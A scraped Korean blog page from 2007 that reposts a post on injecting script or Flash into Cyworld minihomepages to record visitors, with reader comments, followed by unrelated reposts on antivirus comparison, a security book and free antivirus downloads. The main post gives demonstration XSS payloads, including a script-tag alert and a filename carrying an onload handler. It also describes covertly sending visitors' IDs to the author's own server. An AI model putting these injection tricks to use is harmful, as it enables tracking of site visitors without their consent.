우선 많은 분들이 올려주신 Tip들을 하나하나 분석해 보겠습니다.
1. 비밀님
http://www.phpschool.com/gnuboard4/bbs/board.php?bo_table=talkbox&wr_id=138257&page=1538
덕분에 미니미를 좀 고쳐볼 수 있게 되었습니다. 감사합니다 ㅎㅎ
하지만
첫째, 그 때 당시에도 이미지를 수정하는 것은 가능했지만, script를 넣는 것은 안되었을 것으로 보입니다.
둘째, 그나마도 막혀서 http://img.cyworld.nate.com/img/myroom/avatar/ 로 시작하지 않는 이미지는 넣을 수 없습니다. 그래서 싸이월드 이미지들로만 구성된 투명인간 미니미를 만들었지만요 ㅎㅎ
자세한 얘기는 조금 밑에서 해보도록 하겠습니다.


2. 비밀님
http://72.14.253.104/search?q=cache:hOuCnaMXCscJ:6666.tistory.com/53+%EC%8B%B8%EC%9D%B4%EC%9B%94%EB%93%9C+%ED%94%8C%EB%9E%98%EC%8B%9C+%EC%98%AC%EB%A6%AC%EA%B8%B0&hl=ko&ct=clnk&cd=1&gl=kr

이 글을 보니 클럽을 이용한다는 것은 플래쉬를 올리는데 이용하는게 아니라, 기록하는데 사용하고 있는 듯 하군요. 스크립트를 사용할 수 있다면 기록은 문제되지 않습니다. (실제로 저는 제 서버를 이용해서 기록하고 있죠. 여러가지 방법이 있을텐데, 예를들면 방문자 정보를 메일로 받는다거나 하는 것도 가능하죠. )

이 글에서 주목할 점은 '플래쉬를 올렸다'는 점인데,
이점에 대해서 조금 밑에서 얘기해 보겠습니다.



싸이월드를 뜯어보자.

사전 지식으로 짚고 넘어갈 것은, 서버측에서 바꾼 정보는 서버를 해킹하기 전에는 수정하기 힘들다는 점입니다.

첫번째, 현재 사용가능한 http://iwonny.egloos.com/2926230?에 대해서 얘기해보기로 하죠.
많은 분들이 자체 계정에서 돌릴 수 있으면 하는 바람을 주셨습니다.
http://www.iwonny.net/source/cy_count/source.txt
에 올려 놓았습니다만,?정말 별게 아니어서 참 민망합니다.ㅎㅎ
지금보니, 몇줄 안되는 소스임에도 불구하고 대충대충 뚝딱뚝딱 한 티가 팍팍 나는군요 ㅠ_ㅠ
php 이구요, db는 사용하지 않았습니다. ( 파일을 직접 만드는 짓같은 것을 했죠 아하하하 ㅠ_ㅠ )

원리는 간단합니다.
싸이월드는 미니홈피 html에 여러가지 javascript를 이용하기 위해서 방문자 정보를 기억하고 있습니다.
여러분이 어떤 미니홈피를 방문했을 때, 자신의 정보가 여러분에게 보이죠? 그것은 정보를 가지고 있다는 것이죠.
그 중에 간단히 가져올 수 있는 정보가 사용자의 tid, 네이트온아이디 입니다.
이것을 어디론가 보내서 저장한다면? 이게 바로 방문자 기록 이군요.
제가 사용한 방법은 script를 이용해서 저 정보를 제 서버로 보내고, 서버에서 받은 정보를 기록하는 방식 입니다.
간단하죠?


두번째, 미니룸에 스크립트를 달 수 있을까?
네, 일단은 리플로 남겨주신 두가지 방법이 생각나는 군요.

1. 미니미를 바꿔보자.
2. 말풍선에 스크립트를 넣어보자.

1. 미니미를 바꿔보자.
네, 첫번째 비밀님께서 힌트를 주셨던 그 방법입니다.
이것이 가능한 이유는 싸이월드가 미니미를 변경할 때, 서버로 보내는 정보가 아이템의 ID가 아닌 아이템의 이미지 주소 이기 때문입니다.
무슨 의미냐구요?
- 미니미의 머리카락을 1번 모양에서 2번 모양으로 바꿨다고 생각해 봅시다. 그리고는 `미니미 저장' 버튼을 눌렀습니다. 그러면 제가 싸이월드로 보낸 정보는 무엇일까요?
a. 머리는 2번이다.
b. 머리는 http://img.cyworld.nate.com/img/myroom/avatar/hair/2.jpg 이다.
a로 하는 것이 보안상 맞습니다만, 싸이월드는 b를 사용했군요.
덕분에 http://img.cyworld.nate.com/img/myroom/hair/2.jpg이 정보만 바꾸면, 미니미 대신에 아무 이미지나 넣을 수 있게 되었습니다. 덕분에 여러 사람이 미니룸에 커~다란 이미지들을 갖다 넣을 수 있게 되었습니다. 어익후 이거 큰일이군요. 싸이월드는 대책을 세웠습니다. 사용자로부터 미니미 변경 정보가 오면,?http://img.cyworld.nate.com/img/myroom/avatar 로 시작되지 않을 경우 오류를 뱉어버리자. 네, 덕분에 외부 이미지는 사용할 수 없게 되었지만, 싸이월드 미니미 이미지는 마음껏 사용할 수 있겠군요. 덕분에 저는 얼굴 그림 대신에 썬글라스를 씀으로서 투명한 사람이 될 수 있었습니다.

2. 말풍선에 스크립트를 넣어보자.
HTML을 아는 분들이라면, 태그가 < 와 > 사이에 온다는 점을 알고 계실 것입니다.
<img src="abcd.jpg" alt="haha" /> 이미지를 넣는 태그입니다.
여기서 의문점이 생기는 분들이 있죠. " 어라? < 와 > 를 쓰고 싶으면 어떻게? >_< 를 적고 싶은걸? "
네, 그냥 적으면 문제가 되겠죠? < 가 시작한 부분부터 어디선가 > 가 나올 때까지 태그로 인식해버리는 바람에 HTML이 깨질 수 있습니다. 그럼 어떻게?
바로 &lt; &gt; 이죠. 이것들은 < 와 > 를 나타내는 문자들입니다. 웹브라우죠(익스플로러 등)은 저 문자를 < 와 > 로 해석해서 보여주죠.
자, 이 얘기를 왜 했느냐?
말풍선에 넣는 말들의 제한을 풀어서 서버로 보낼 수는 있습니다.
제가 <script language="javascript">alert('hello');</script> 라는 스크립트를 넣었다고 해봅시다.
이게 의미하는 바는 hello 라는 경고창을 띄워라 입니다.
싸이월드 서버쪽에서는 저것을 받아서 말풍선에 넣을 때 어떻게 넣을까요?
네! 그렇습니다, &lt;script language="javascript"&gt;alert('hello');&lt;/script&gt;으로 변경되서 집어 넣는군요.
저런, 서버쪽에서 저렇게 변경하는 것이니 < 와 > 를 쓰지 못하는 이상 제게 스크립트를 쓸 기회는 없군요.


세번째, 메인 페이지에 플래쉬 넣기, 가능할까?
원래 싸이월드를 안했기 때문에, 제 추측을 말씀드려 보겠습니다.
1. 기존에는 싸이월드 메인페이지에있는 사진에 플래쉬를 직접 넣는 것이 가능했습니다. (맞나요?)
하지만 문제점이 생겼죠. 플래쉬를 이용해서 방문자 정보를 알아낸다는 것이었습니다!
2. 싸이월드 내에서 제공하는 플래쉬만 사용하게 해 놓았습니다. ( 맞는지 모르겠네요-_- )
기본적으로 플래쉬와 이미지는 삽입 태그가 다릅니다. 제가 아는 바로 이미지 삽입 태그는 img 이고 플래쉬는 embed를 이용하는 것으로 알고 있습니다. 즉, <img src="hahahahaha.swf" alt="flash?" /> 라고 입력해 보았자 플래쉬가 작동하는게 아니라는 것입니다.
플 래쉬가 올라가는 것 자체가 가능했던 시절, 싸이월드는 embed 를 사용할 것인가, img를 사용할 것인가를 서버에서 결정하도록 해놓았겠죠. 사용자들은 그것을 이용해서 swf를 embed 태그로 사용하도록 넣어 놓았고, 플래쉬가 나올 수 있었던것이죠.

여기까지가 제 추측입니다.

3. 현재 싸이월드는 메인페이지에 있는 사진에 플래쉬 자체를 넣지 않는다.
지금 제가 정상적인 방법으로 싸이월드 메인페이지 사진에 플래쉬를 ( 그것이 싸이월드가 제공하는 것이든 아니든 ) 넣을 수 있는지 알고 싶군요. 없다고 알고 있습니다. (혹시 도토리 주고 사면 올려주는 그런것도 있나요?)
없다고 가정하면?이런 결론이 나옵니다.
싸이월드 메인페이지 사진에는 img 태그만을 사용한다.
이럴 경우 이렇게 저렇게 돌아가도 플래쉬는 img 태그 안으로 들어가서 작동하지 않게 되는군요.

* 추가 : 아주 예전에 해커들이 흔히들 사용했다는 방법이 있습니다. (허술한 곳에서는 아직도 사용 가능합니다.)
비슷한 원리로 얘기를 해보죠.
가나다.jpg 라는 파일을 올려보도록 하겠습니다.
싸이월드가 주는 HTML을 열어보면
<img src='가나다.jpg' alt=' /> 라고 나온다고 가정해 보죠.
이제 가나다.jpg라는 이미지의 이름을?가나다' onload=javascript:alert('hihi'); alt='.jpg 로 변경해 보죠.
그러면 싸이월드가 주는 HTML에 들어가는 정보가 어떻게 될까요?
네! <img src='가나다' onload=javascript:alert('hihi'); alt='.jpg' alt=' />
가 되었으면 하는 바람이군요! 저 코드가 의미하는 바는, 이 이미지가 다 불려지면 javascript:alert('hihi'); 라는 스크립트를 실행하라 입니다. 즉 응용하면 여러가지 일을 할 수 있다는 것이군요.
하지만~ 역시 옛날에 쓰던 방법이니만큼, 안된다는 것이 안타까울 뿐이죠.
스페이스, 한글, ' 등 파일명에 있는 영어가 아닌 글자들은 %23 등의 숫자로 변경됩니다. ( &lt; 가 < 인것과 비스므리 하죠 )
즉, 기대했던 결과값과는 다르군요.




결론,
그런 의미에서 위의 것들을 통한 스크립트 삽입?- 그것을 통한 방문자 기록 - 은 어렵다는 견해입니다.
물론, 여러가지 기상 천외한 방법들이 나올 수 있겠죠, 참신한 아이디어가 넘쳐나는 세상이니까요 ㅎㅎ.

paros를 이용했다는 얘기를 해주신 분이 계시군요, 시간날 때 한번 뒤적뒤적 해 보겠습니다.

많은 분들이 기대를 해주셨는데, 이래서 안된다 저래서 안된다 라는 말씀만 드려서 많이 죄송하네요;
시간 날때 또 다른 방법으로 뜯어보겠습니다 ㅠ_ㅠ 감사합니다.

# by 워니 | 2007-02-20 01:23 | 컴이야기 | 트랙백 | 덧글(29)





트랙백 주소 : http://iwonny.egloos.com/tb/3007321
내 이글루에 이 글과 관련된 글 쓰기 (트랙백 보내기) [도움말]

Commented at 2007-02-20 03:20 # x




비공개 덧글입니다.


Commented by 민찬 at 2007-02-20 04:07 #




밸리에서 왔어요'ㅂ' 요즘 한창 싸이가 마음에 안들던 참인데;
특히 프로필 게시판 HTML안되는건-_-... 쳇,
유익한 글 몇개 잘 읽고 가요^^, 덧붙여 링크신고도 합니당 큐웃

Commented by 크리스티아누 at 2007-02-20 06:50 # x




http://solsolsiryo.tistory.com/787
며칠 전에 여기서 성공했었네요..

Commented by 발당 at 2007-02-20 09:12 # x




뱃사람 변태.


Commented by 워니 at 2007-02-20 09:35 #




비밀// 아, 감사합니다 ㅠ_ㅠ 연휴 잘 보냈죠 ~ 아, 따뜻한 리플덕에 더 죄송해지는군요, 시간내서 또 뜯어봐야겠다는 마음이..;;
민찬// 저도 싸이가 왠지 꺼림찍해서 안쓰고 있어요;; 와아 - 감사합니다ㅎㅎ
크리스티아누// 오, 여기도 남겨주셨네요 - 저분 처음으로 플래쉬를 이용해서 방문자 알아냈던 그분 블로그군요!! 지금 동영상이 끊겨있는데, 다시 살아나면 확인해 볼게요~
발당// 욱기지마-0- ㅋ

Commented by 쿠니쿠니 at 2007-02-20 09:51 # x




파로스를 이용해서 미니미 그림을 바꿔본적이 있습니다.
상당한 노가다였지요
그리고 미니룸 말풍선 글자 제한도 없애본적이 있지만.. 아무소용없더군요
위에서 말씀하신거와같이 <,>를 다른방법으로 기록해서;;;;

스토리룸을 어찌해보면 바꿔볼수 있을듯합니다.
지금 시도중이구요 ^^

Commented at 2007-02-20 11:02 #




비공개 덧글입니다.


Commented by 자유 at 2007-02-20 11:36 #




왜 이런 짓을 .. 찌질아 이런 거 하지 말고 밥이나 사줘 ;ㅁ;


Commented by 워니 at 2007-02-20 11:37 #




쿠니쿠니//
오오! 그렇군요! 멋집니다!!!
지금 뜯어보니 스토리룸은 말풍선 swf를 보낼 때 클라이언트에서 주소를 설정해서 보내는군요!!
와우, 멋집니다! ㅋㅋ 축하드려요~

회사에서 잠깐 뜯어보다가 사장님께 눈치보여 버렸습니다 ㅠ_ㅠ ㅎㅎ
시간날때 막히기전에 해봐야지~ㅋ
짜앙-_-)b ㅎㅎ

Commented by 에버태지 at 2007-02-20 11:58 # x




진짜 최악이다 너


Commented by 워니 at 2007-02-20 12:11 #




에버태지// 뭐야 이건


Commented by at 2007-02-20 13:13 # x




개인시간까지 쪼개서 도움을 주시려고 하시는군요. 감사할따름입니다.
성공하시리라 믿습니다.

Commented by 크리스티아누 at 2007-02-20 13:24 # x




워니님 파이팅~^^..ㅋ


Commented by 워니 at 2007-02-20 18:46 #




와아 와아 응원해주신 분들 감사합니다~
쿠니쿠니님 힌트덕분에 플래시 삽입 성공했네요 ㅎㅎ
이제 노가다 일이 남았는데, 하하하하
언제쯤 또 시간이 날지-_-a
(사장님께서 눈치 많이주셨어요 ㅠ_ㅠ )

Commented by 쿠니쿠니 at 2007-02-20 19:23 # x




워니// ㅊㅋㅊㅋ 합니다.

플래시가 상당히 화려하군요 ^^

Commented at 2007-02-20 19:32 #




비공개 덧글입니다.


Commented by lovely at 2007-02-20 19:46 # x




완전축하합니다~
이제 노가다에 응원을 보냅니다

where_chk 값은 초단위시간값과 사용자와 게시판종류에 따라서 달라지는 것 같군요
알고리즘하나는 풀었다는 분이 있는데 이걸 푸는 일보다는
플래쉬 올리기가 가능하니 스크립트를 심어서 다른 곳에 방법이 더욱 빠르겠네요^^

Commented by 하앜 at 2007-02-20 22:25 # x




오... 이제 스토리룸에 방문자 추적기능 나올날도 얼마 안남았군여....워니님 멋쟁이


Commented by sizzai at 2007-02-20 22:33 # x




우와 정말 대단하세요!!
이렇게 애써주시니 정말 감사합니다 ㅎㅎ

Commented by jsd9399 at 2007-02-20 22:48 # x




ㅋㄷ 드디어 올리셨군요... ㅋㅋ
축하드려요~~

Commented by 이니 at 2007-02-21 00:25 #




어렵다a 길다a 과외학생돌아왔다a


Commented by 크리스티아누 at 2007-02-21 02:18 # x




와우!!!축하드려요~ㅋ워니님 멋쟁이!!!
하지만 곧 싸이2가 나온다는 거~!
이번에도 싸이가 과연 막을런지ㅋ

Commented by spatialguy at 2007-02-21 11:08 # x




오빠멋져~


Commented at 2007-02-21 17:27 # x




비공개 덧글입니다.


Commented at 2007-02-21 22:00 # x




비공개 덧글입니다.


Commented at 2007-02-21 22:33 # x




비공개 덧글입니다.


Commented by 워니 at 2007-02-22 00:31 #




와아 응원 감사합니다^^ ㅎㅎ
아 정말 좀처럼 시간이 안나네요 ㅠ_ㅠ
1시에 자서 7시에 일어날때까지 이렇게 짬이 안날줄은 몰랐습니다 흑흑;;

급한대로 내일쯤 플래시 올리는 방법부터 적어 놓도록 하겠습니다,
(점심시간에 해야 눈치 안받겠네요 ㅋㅋ)

lovely// 정답~!! 경제학적으로 봤을때-_- 그게 더 좋겠죠? ㅎㅎ
하앜, sizzai, jsd9399// 와아 감사합니다~ 한 일에 비해서 더 많이 기뻐해주시니 몸둘바를 모르겠네요 ㅎㅎ
쿠니님// 축하드려요! 추적까지 성공하셨군요~ 와아 정보 감사합니다~
이니// 오, 졸축 -_-)b 과외생 함 보고싶을정돈데?
크리스티아누// ㅋㅋ, 아마도 이번 방법도 싸이측에서 막는건 5분이면 충분 할 것 같네요-_-a
spatialguy// -_-ㅋ 서버 들어갔어요? 관리 더 해야되는디;
비밀// 와아~ 그런것도 있었겠군요 ㅋ 넵 즐거운 하루 되세요~
비밀// 내일 올려드릴게요 ㅎㅎ
비밀// ㅎㅎ 전에도 말씀드렸지만, where_chk 변수는 방문자 추적하는데 전혀 필요가 없었죠? ㅎㅎ (기록하는데 필요할 뿐이니까요 ㅋ) 플래쉬만 올리시면 성공하시겠군요~
내일 올려볼게요 ㅎㅎ

Commented at 2007-02-22 00:39 # x




비공개 덧글입니다.


Commented by 수호전사 at 2007-03-02 10:39 # x




아,, 쓸때없는 얘기 죄송하지만,,,, 이게 싸이월드 말고 저같은 중딩이 많이하는 버디버디도 가능하군요,,
http://hompy.buddybuddy.co.kr/kcs5751 아바타가 개 발살 났습니다.

출처: ?http://iwonny.egloos.com/3007321

신고
  1. Arielle Sekulski 2010.09.06 18:27 신고

    astonishing blog post, that's what I was looking for, I thank the author of this post with all my heart.


백신 성능 비교하기


얼마전에 DShield 의?Handler's Diary 에 백신 성능 비교하기 라는 글이 올라왔습니다. 백신 성능에 대해 어느게 좋다 나쁘다 시끄러운데, 기술적인 내용을 모르는?일반 사용자?입장에선 이런 말을 들을 때면 불안감만 커지고 뭐가 맞는 소린지 모르겠고 답답하지요. 이런 분들께 도움이 되는 내용이 실려있네요.

저는 주로 VirusTotal 을 애용하는 편이고, 국내외 백신 회사 직원들도 VirusTotal 을 즐겨 찾는 편이라고 알고 있습니다. 바이러스로 의심되는 파일이 있는데, 컴퓨터에 설치된 백신으로는 검출이 안될 때도 VirusTotal 에 올려보면 전세계 수십종의 백신으로 검사해서 결과를 알려주니 편리합니다.

원문에 언급되는?랭킹 사이트나 자신이 직접 하는 방법은 비추~

요즈음 VirusTotal?의?결과 추이를 지켜보면 AntiVir, AVG, BitDefender, F-Secure, Ikarus, Kaspersky, NOD32, Sophos 등이 꾸준히 좋은 결과를 보여주고 있습니다.

특 히 Ikarus 의 경우 다양한 변종이나 실행압축변형 바이러스에서 좋은 결과를 보여주고 있는 반면, Kaspersky 나 Sophos 는 변종과 실행압축변형 탐지 결과가 약해지는 모습을 보이더군요. Ikarus 는 근데... 탐지되는 편차가 큰게 문제....

국내 백신 회사들도 해외 시장 공략을 위해 VirusTotal 과 연계해보는 것은 어떨까 하는 생각을 해봅니다.


출처: 보안 전문가님이신... http://swbae.egloos.com/tb/1522644

신고

어플리케이션 보안 서적 소개


오늘 교보문고에서 'The Art of Software Security Assessment: Identifying and Preventing Software Vulnerabilities' 라는 책을 보았습니다.


( 책 표지 )



Addison-Wesley 에서 나온 책으로 McAfee, Neohapsis 에서 근무하는 보안 전문가들이 쓴 어플리케이션 보안 서적입니다. 전체 분량의 대부분이 C 프로그래밍과 보안 이슈에 대해 다루어지는 점이 약간 아쉬운 부분입니다.

이 책을 읽고 처음에 든 생각은 '왠지 억울하다' 라는 것입니다. Phrack 등 해외 자료를?어렵게 읽어서 익힌 내용들이 이 책에는 일목요연하게 정리되어 그림과 함께 이해하기 쉽게?적혀 있습니다. 이래도 됩니까?

내 용도 보안 전문가들이 쓴 책 같지 않고 개발자들이 쓴 듯한 느낌이 들더군요. 어플리케이션 보안 서적 중에 리버싱을 집중적으로 다루는 서적들이 있는데, 개발자 입장에선 이런 접근이 부자연스럽죠. 기존의 어플리케이션 보안 서적을 읽고 실망한 개발자들이라면 한번 읽어보셔도 좋을 듯... 아마 자연스레 '아, 내가 짤 때 이런?코드에서 이런 실수를 하면 안되겠구나...', '어! 나도 이 코드랑 똑같이 짰는데...' 하는 생각이 드실 겁니다. 공격자 입장이 아닌, 개발자 입장에서 코드의 보안에 대해?접근하기 때문인 듯...

그리고 책 초반에 어플리케이션 보안 분석 절차에 대해?다루고 있는데,?저도 실무에서 쓰는 접근법입니다. 기존의 방법론 자료들이 실무 경험이 없는?이론가들에 의해 작성되어 거창할 뿐 실무에선 하나도 쓸모가 없었던 반면, 이 서적에 나오는 접근법은 직접 어플리케이션 보안 분석을 해봤던 실무자들에 의해 작성되어 매우 실용적이고 효율적입니다. 적어도 제 경험으론 그랬습니다.

아참, 사이즈가 베개입니다. 주의하시길~

 


 



출처:? 보안 전문가님이신.. http://swbae.egloos.com/tb/1523598
신고
바이러스백신 모르셔서 그렇지 개인용으로 쓴다면

무료가 꽤 많습니다.

일단 외산으로는 대표적으로 3가지가 있습니다.

ANTI-VIR, AVAST, AVG 이렇게 3가지가 있습니다.

번회로 Bit-defender도 있습니다...근데 실시간 감시기능이 없죠

http://www.free-av.com/

http://www.avast.com/eng/download.html

http://free.grisoft.com/doc/2/lng/us/tpl/v5

위에 링크가 나열한 차례대로 다운받을수 있는곳입니다.

그리고 번외로 kaspersky를 몇가지 기능만 빼고 그대로 가지고온 무료백신이 있습니다.

AOL active virus shield 입니다...

근데 이건 이메일을 적어보내고 인증코드를 받으셔야 합니다.

조금 번거롭죠...http://www.activevirusshield.com/antivirus/freeav/index.adp?

그리고 국산으로는 유니코어가 있습니다.

이것도 kaspersky엔진을 사용합니다

하지만 무료인대신에 업데이트를 본인이 직접 수동으로 하셔야 합니다

http://www.geot.com/down/down_test.php

그리고 다른 형태로는 툴바형태가 있습니다

네이버, 다음, 엠파스 이렇게 3개가 툴바형태로 백신을 무료제공하고 있습니다.

네이버는 kaspersky와 피시지기

다음은 안랩의 V3

엠파스는 하우리의 바이로봇

이런식으로 툴바를 설치하시게 되면 무료로 사용하실수 있는 툴바들입니다.

잘만 찾아보시면 무료가 생각보다 많아요...

선택하셔서 치료하십시오..

궁금하시면 쪽지 주세요...
악성코드제거기도 하나쯤은 가지고 계셔야 합니다

국산무료:pcfree(http://www.pcfree.co.kr/html/download.php?MENU=03&SUB_MENU=01)

외산무료:ad-aware, spy-bot
http://www.lavasoftusa.com/, http://www.safer-networking.org/en/index.html

뒤에 링크건 스파이봇은 일단 영어를 다운받으신다음에

프로그램켜시고 설정탭에 보시면 한글 선택할수가 있습니다.

출처: http://kin.naver.com/db/detail.php?d1id=1&dir_id=106&eid=EdGiuBhsYnx/ckXFSkFIVFId6bXvnWhH&qb=uau34bnpvcU=
신고

+ Recent posts